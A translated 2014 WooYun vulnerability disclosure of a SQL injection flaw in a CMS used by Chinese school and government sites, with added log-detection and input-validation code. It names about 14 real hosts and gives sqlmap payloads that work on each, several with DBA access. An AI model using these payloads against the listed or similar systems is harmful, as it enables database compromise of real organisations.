
Vulnerability summary

Defect ID: wooyun-2014-059967

Title: A software vendor's product has a generic (DBA-privilege) SQL injection vulnerability

Related vendor: cncert National Internet Emergency Center

Reporter: 路人甲

Submitted: 2014-05-09 18:08

Fixed: 2014-08-07 18:10

Published: 2014-08-07 18:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-05-09: details sent to the vendor, awaiting vendor handling
2014-05-12: vendor confirmed; details visible to the vendor only
2014-05-15: details opened to third-party security partners
2014-07-06: details opened to core white hats and domain experts
2014-07-16: details opened to regular white hats
2014-07-26: details opened to intern white hats
2014-08-07: details opened to the public

Brief description:

WooYun is getting better and better! 10,000 generic Lists pre-stored.
I finally feel recognized; if you feel the same, please click Thanks! ^ ^

Detailed description:

Technical support (vendor credited on the sites): 数域科技(杭州)有限公司
Injection points:
1. index.aspx?pageGuid=
2. newsId=
Affected sites (note that I verified only one page per site; pageGuid and newsId appear on several pages, so when fixing you need to audit the whole site).
Manual checking found 10 schools + 5 government finance agencies affected.
1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C
2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189
4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402
7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10
9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99
10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765
11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243
12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593
13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567
14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624
Warning (same product, not verified here):
1.http://das.hhtz.gov.cn/archive/index.aspx?pageguid=349219E1-28BB-4849-BE72-2F05EAD8D5B5&CatalogID=742
2.http://www.bjsqxy.org/index.aspx?pageguid=E2859CC5-DFBC-4066-876B-2E2BA585FDBB

Proof of vulnerability:

1.http://www.hzdgxx.org/index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C

Place: GET
Parameter: pageGuid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' AND 2824=2824 AND 'VseI'='VseI
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


2.http://www.hzst.gov.cn/index.aspx?newsId=42993&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC

Place: GET
Parameter: newsId
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: newsId=(SELECT CHAR(113)+CHAR(122)+CHAR(116)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(109)+CHAR(119)+CHAR(113))&CatalogID=934&PageGuid=4A3B6524-953E-4CA2-A5C4-0DC81BDEF4CC
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


3.http://hzchzx.cn/index.aspx?pageGuid=505698AB-366C-4C59-B789-F0D342E39758&CatalogID=189

Place: GET
Parameter: pageGuid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' AND 7519=7519 AND 'znbd'='znbd&CatalogID=189
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758'; WAITFOR DELAY '0:0:5'--&CatalogID=189
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageGuid=505698AB-366C-4C59-B789-F0D342E39758' WAITFOR DELAY '0:0:5'--&CatalogID=189
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


4.http://www.hzbjzg.org/index.aspx?newsId=10520&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=10520 AND 9164=9164&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=10520; WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=10520 WAITFOR DELAY '0:0:5'--&CatalogID=47&PageGuid=FD804F14-7CFB-4740-BC00-C9960E36B350
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


5.http://www.hzbwxx.com/index.aspx?newsId=10668&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=10668 AND 2117=2117&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: newsId=10668 AND 1486=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1486=1486) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113)))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: newsId=10668 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(108)+CHAR(76)+CHAR(82)+CHAR(112)+CHAR(69)+CHAR(78)+CHAR(73)+CHAR(72)+CHAR(80)+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: newsId=(SELECT CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8905=8905) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(109)+CHAR(113))&CatalogID=32&PageGuid=41A9DA9A-52D0-42A3-B61D-447A6B9ACCA7
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


6.http://hzgxsy.net/index.aspx?pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C&NewsID=11402

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' AND 2193=2193 AND 'KyWu'='KyWu&NewsID=11402
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C'; WAITFOR DELAY '0:0:5'--&NewsID=11402
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=2429F467-97DD-4820-8B3B-F98A37E3562C' WAITFOR DELAY '0:0:5'--&NewsID=11402
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


7.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


8.http://yuweishiny.13.dns222.net/index.aspx?pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5&ShopID=10

---
Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' AND 9381=9381 AND 'Vysz'='Vysz&ShopID=10
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5'; WAITFOR DELAY '0:0:5'--&ShopID=10
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=D5EC1A38-2094-4D2A-8A45-834EBDC335F5' WAITFOR DELAY '0:0:5'--&ShopID=10
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2005


9.http://61.175.193.70:99/index.aspx?pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' AND 6773=6773 AND 'wbkn'='wbkn
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=A0FE8D4B-144A-4984-8B36-89D27B907F99' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


10.http://www.hzxxsy.com/index.aspx?pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C&NewsID=6765

Place: GET
Parameter: pageguid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' AND 8213=8213 AND 'jZpr'='jZpr&NewsID=6765
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C'; WAITFOR DELAY '0:0:5'--&NewsID=6765
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageguid=25E37238-3468-45C9-A23B-B69FC8ED1A2C' WAITFOR DELAY '0:0:5'--&NewsID=6765
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


11.http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=243

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=243 AND 9303=9303
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-2691 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(103)+CHAR(112)+CHAR(102)+CHAR(71)+CHAR(114)+CHAR(79)+CHAR(106)+CHAR(115)+CHAR(65)+CHAR(113)+CHAR(116)+CHAR(121)+CHAR(121)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=243; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=243 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


12.http://60.191.18.37:8088/WebHall/NewsDatail.aspx?newsId=3593

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3593 AND 4569=4569
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-4271 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(110)+CHAR(98)+CHAR(113)+CHAR(101)+CHAR(69)+CHAR(107)+CHAR(113)+CHAR(74)+CHAR(118)+CHAR(98)+CHAR(78)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(119)+CHAR(105)+CHAR(119)+CHAR(113),NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3593; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3593 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


13.http://218.75.32.196:8020/WebHall/NewsDatail.aspx?newsId=3567

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3567 AND 8900=8900
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-6027 UNION ALL SELECT NULL,CHAR(113)+CHAR(119)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(66)+CHAR(111)+CHAR(97)+CHAR(115)+CHAR(111)+CHAR(114)+CHAR(67)+CHAR(77)+CHAR(83)+CHAR(89)+CHAR(113)+CHAR(114)+CHAR(107)+CHAR(116)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3567; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3567 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


14.http://60.191.17.52/WebHall/NewsDatail.aspx?newsId=3624

Place: GET
Parameter: newsId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=3624 AND 8066=8066
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: newsId=-3498 UNION ALL SELECT NULL,CHAR(113)+CHAR(100)+CHAR(97)+CHAR(109)+CHAR(113)+CHAR(97)+CHAR(77)+CHAR(114)+CHAR(80)+CHAR(90)+CHAR(111)+CHAR(75)+CHAR(70)+CHAR(105)+CHAR(87)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsId=3624; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsId=3624 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
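The sqlmap output above shows the same four probe classes against every site: boolean-based blind (N=N tautologies), stacked and time-based (WAITFOR DELAY), UNION and inline/error-based queries built with CHAR() concatenation. For anyone running one of the affected sites, the cheapest way to spot such probing in IIS or proxy access logs is not a payload signature list but the parameters' expected shape: newsId is only ever an integer and pageGuid only ever a GUID, so anything else in those parameters is worth an alert. The Python below is an added example (it is not part of the report and not the vendor's code); the log lines are constructed, the parameter names and expected shapes come from the URLs in the report, and the signature list is a second net that labels which probe class a hit resembles.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the report). The query strings mirror
# the payload classes sqlmap reported: a clean request, a stacked/time-based probe,
# a UNION probe built with CHAR(), a boolean tautology, and another clean request.
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2014:18:01:02 +0800] "GET /index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C HTTP/1.1" 200 5120
10.0.0.9 - - [09/May/2014:18:01:07 +0800] "GET /index.aspx?pageGuid=CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 5120
10.0.0.9 - - [09/May/2014:18:01:09 +0800] "GET /WebHall/NewsDatail.aspx?newsId=-2691%20UNION%20ALL%20SELECT%20NULL%2CCHAR(113)%2BCHAR(106)-- HTTP/1.1" 200 812
10.0.0.9 - - [09/May/2014:18:01:11 +0800] "GET /index.aspx?newsId=10520%20AND%209164%3D9164&CatalogID=47 HTTP/1.1" 200 5120
10.0.0.7 - - [09/May/2014:18:02:00 +0800] "GET /index.aspx?newsId=42993&CatalogID=934 HTTP/1.1" 200 4870
"""

# Request line inside a combined-format log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# What each parameter is supposed to look like, taken from the report's URLs:
# newsId is numeric, pageGuid is a GUID. Names are compared case-insensitively
# because the affected sites spell it pageGuid, PageGuid and pageguid.
EXPECTED_SHAPE = {
    "newsid": re.compile(r"^\d{1,10}$"),
    "pageguid": re.compile(r"^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$"),
}

# Signatures for the probe classes in the sqlmap output. The shape check is the
# primary detection because it needs no knowledge of payloads; these only label hits.
SIGNATURES = [
    ("time-based blind", re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("stacked query", re.compile(r";\s*(WAITFOR|EXEC|SELECT|INSERT|UPDATE|DELETE)\b", re.I)),
    ("union query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    ("char() string building", re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(", re.I)),
]

def inspect_params(target):
    """Decode the query string and return (name, value, findings) for each bad parameter."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        findings = []
        shape = EXPECTED_SHAPE.get(name.lower())
        if shape is not None and not shape.match(value):
            findings.append("shape violation")
        findings += [label for label, pat in SIGNATURES if pat.search(value)]
        if findings:
            hits.append((name, value, findings))
    return hits

def scan_log(log_text):
    """Return one alert dict per suspicious parameter found in the log text."""
    alerts = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for name, value, findings in inspect_params(m.group("target")):
            alerts.append({"line": line_no, "client": client, "param": name,
                           "value": value, "findings": findings})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']} {alert['client']} {alert['param']}={alert['value']!r}: "
              + ", ".join(alert["findings"]))
```

Running it prints three alerts, all from 10.0.0.9, and nothing for the two clean requests. Because parse_qsl percent-decodes before the checks run, URL-encoded variants of the same probes are caught as well; a WAF or log pipeline that matches on the raw request line would miss them.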

Fix recommendation:

Numeric parameter newsId
Fix: when receiving the newsId parameter, force-convert it to an integer.
Taking an id parameter as an example:
int id = Integer.parseInt(request.getParameter("id")); // convert the id parameter to an integer before it reaches the database query; a non-numeric value throws NumberFormatException, so the query never sees it
String parameter pageGuid
Fix: when receiving the pageGuid parameter, restrict it to a whitelist.
For example, I would only allow pageGuid to take the handful of values in an array we define; that array is our whitelist.
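The two fixes above (integer cast for newsId, whitelist for pageGuid) are necessary but only complete when the validated values are then bound as query parameters rather than concatenated into SQL. The Python below is an added example, not the report's or the vendor's code; the affected product is ASP.NET, and the same three checks map directly onto int.TryParse, Guid.TryParse and SqlParameter there. The in-memory SQLite schema and rows are constructed stand-ins, the whitelist is read from the pages table instead of a hard-coded array, and the rejected inputs are the payload shapes from the sqlmap output above.

```python
import re
import sqlite3
from uuid import UUID

class BadRequest(ValueError):
    """A request parameter failed validation; the page should answer HTTP 400, not query the DB."""

def parse_news_id(raw):
    """Numeric parameter: accept only a plain positive integer (the report's 'force integer' fix).
    The regex runs first so that a value such as '10520 AND 9164=9164' fails closed
    instead of reaching int() or the query."""
    if raw is None or not re.fullmatch(r"[1-9]\d{0,9}", raw):
        raise BadRequest("newsId must be a positive integer")
    return int(raw)

def parse_page_guid(raw, allowed):
    """String parameter: must parse as a GUID and be on the allowlist (the report's whitelist fix).
    uuid.UUID rejects anything that is not exactly 32 hex digits once hyphens are removed,
    so a GUID with a quote and SQL appended can never normalise to a valid value."""
    try:
        guid = str(UUID(raw)).upper()
    except (ValueError, TypeError, AttributeError):
        raise BadRequest("pageGuid is not a GUID")
    if guid not in allowed:
        raise BadRequest("pageGuid is not a known page")
    return guid

def build_demo_db():
    """Constructed in-memory stand-in for a CMS pages/news schema (sample data, not the vendor's)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (page_guid TEXT PRIMARY KEY, title TEXT);
        CREATE TABLE news  (news_id INTEGER PRIMARY KEY, page_guid TEXT, title TEXT);
        INSERT INTO pages VALUES ('CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C', 'Home');
        INSERT INTO news  VALUES (10520, 'CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C', 'Term dates');
        INSERT INTO news  VALUES (10521, 'CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C', 'Sports day');
    """)
    return conn

def load_page_allowlist(conn):
    """The whitelist: the set of GUIDs the site actually publishes, read from the pages table."""
    return {row[0] for row in conn.execute("SELECT page_guid FROM pages")}

def fetch_news(conn, params):
    """Hardened handler: validate every parameter, then bind it; never concatenate into SQL."""
    news_id = parse_news_id(params.get("newsId"))
    page_guid = parse_page_guid(params.get("pageGuid"), load_page_allowlist(conn))
    return conn.execute(
        "SELECT news_id, title FROM news WHERE news_id = ? AND page_guid = ?",
        (news_id, page_guid),
    ).fetchone()

def handle(conn, params):
    """Request entry point: returns (status, body) the way a page handler would."""
    try:
        row = fetch_news(conn, params)
    except BadRequest as exc:
        return 400, str(exc)
    if row is None:
        return 404, "no such article"
    return 200, {"newsId": row[0], "title": row[1]}

if __name__ == "__main__":
    db = build_demo_db()
    good = {"newsId": "10520", "pageGuid": "ca4f6c5c-d834-46f8-9aa7-cfa9fb65ba1c"}
    print(handle(db, good))
    # Parameter shapes taken from the report's sqlmap output; each must come back as 400.
    for bad in ({"newsId": "10520 AND 9164=9164", "pageGuid": good["pageGuid"]},
                {"newsId": "10520", "pageGuid": "CA4F6C5C-D834-46F8-9AA7-CFA9FB65BA1C' AND 2824=2824 AND 'VseI'='VseI"},
                {"newsId": "10520; WAITFOR DELAY '0:0:5'--", "pageGuid": good["pageGuid"]}):
        print(handle(db, bad))
```

The validation rejects malformed input before any database call, which also removes the time-based and stacked-query probes; the parameterized query is the second layer, so that even a whitelist mistake (for example a GUID column that later accepts free text) cannot turn a validated value back into SQL. Note that parse_page_guid normalises case, so the mixed spellings seen across the affected sites (pageGuid, PageGuid, pageguid) all compare against the same uppercase allowlist.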

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2014-05-12 18:50

Vendor reply:

CNVD confirmed and reproduced the described issue, and has passed it through public contact channels to the software vendor 数域科技(杭州)有限公司 for handling.

Latest status:

None yet